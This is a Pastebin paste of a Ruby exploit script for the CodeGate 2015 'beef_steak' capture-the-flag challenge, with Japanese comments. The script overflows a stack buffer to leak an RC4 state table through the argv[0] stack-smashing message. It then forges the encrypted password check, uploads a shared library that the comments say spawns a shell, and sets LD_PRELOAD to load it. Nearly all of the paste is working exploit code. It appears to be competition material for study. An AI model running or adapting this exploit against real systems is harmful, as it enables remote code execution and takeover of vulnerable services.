API tools faq
paste
Advertisement
encry1024

CodeGate2015 beef_steak

encry1024
Feb 2nd, 2016
145
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 2.42 KB | None | 0 0
raw download clone embed print report
  1. # coding: ascii-8bit
  2. require 'ctf.rb'
  3. require 'hexdump'
  4.  
  5. # Keyword
  6. # ・StackBOF => argv[0] leak
  7. # ・Share Library Injection
  8. # ・RC4
  9.  
  10. Host = "localhost"
  11. Port = 8887
  12.  
  13. def get_stable(offset = 0)
  14.   puts "[+] RC4 S table leak by argv[0] leak".colorize(:red)
  15.   Cpwn.open(Host, Port) do |c|
  16.     payload = "\x00" * 0x118          # 0にしとくと暗号かされないで済む.strlenが0を返すので
  17.     payload << p64(0x602160 + offset) # offset分足したアドレスからリークすることで"\x00"以降を抜き取る
  18.     payload << "\n"
  19.     c.send(payload)
  20.     c.recv_until("detected ***: ")
  21.     return c.recv_until(" terminated").gsub(" terminated", "")
  22.   end
  23. end
  24.  
  25. # RC4の処理をそのまま記述
  26. def rc4_prga(size, stable_origin)
  27.   stable = Marshal.load(Marshal.dump(stable_origin)) # stabeleを使い回すためにコピーを作った
  28.   i, j, output = 0, 0, ""
  29.   size.times do
  30.     i = (i + 1) % 256
  31.     j = (j + stable[i]) % 256
  32.     stable[j], stable[i] = stable[i], stable[j]
  33.     c = stable[(stable[i] + stable[j]) % 256]
  34.     output << c.chr
  35.   end
  36.   output
  37. end
  38.  
  39. def rc4(s1, stable)
  40.   s2 = rc4_prga(s1.length, stable)
  41.   xored = ""
  42.   s1.length.times do |i|
  43.     xored << (s1[i].ord ^ s2[i].ord).chr
  44.   end
  45.   return xored
  46. end
  47.  
  48.  
  49. # argv[0] leakでは"\x00"で途切れてしまうので, \x00を追加したのち
  50. # もう一度その長さ分足したアドレスからleakしている.
  51. stable =  get_stable(0)
  52. stable << "\x00"
  53. stable << get_stable(stable.length)
  54. Hexdump.dump(stable)
  55. stable = stable.chars.map(&:ord)
  56.  
  57.  
  58. Cipher = p64(0xf39fbfbd85aa3162, 0xe4ab23ac750c028a, 0x61c9bdef7a25c582)
  59.  
  60. Cpwn.open(Host, Port) do |c|
  61.  
  62.   # 0x400c5b <main+318>: call   0x400840 <strcmp@plt>
  63.   # arg[0]: 0x602120 --> output
  64.   # arg[1]: 0x400da6 --> 0xf39fbfbd85aa3162
  65.   # 0x400da6:       0xf39fbfbd85aa3162      0xe4ab23ac750c028
  66.   # 0x400db6:       0x61c9bdef7a25c582      
  67.  
  68.   buf = rc4(Cipher, stable)
  69.   c.send(buf + "\n")
  70.   puts c.recv_until("message")
  71.   c.send(`cat mylib.so`)       # upload shared library(shellを起動する)
  72. end
  73.  
  74.  
  75. Cpwn.open(Host, Port) do |c|
  76.  
  77.   # c.debug = true
  78.   # envp[0] : 0x128
  79.  
  80.   # 実行中のプログラムでLD_PRELPAD=./messageに設定する
  81.   buf = rc4(Cipher+"\0\0"+"LD_PRELOAD=./message\0", stable) + "\0"
  82.   buf << " " * (0x128 - buf.length)
  83.   buf << p64(0x60213a, 0x0)
  84.   buf << "\n"
  85.  
  86.   c.send(buf)
  87.   puts c.recv_until("message")
  88.   c.hacked
  89. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!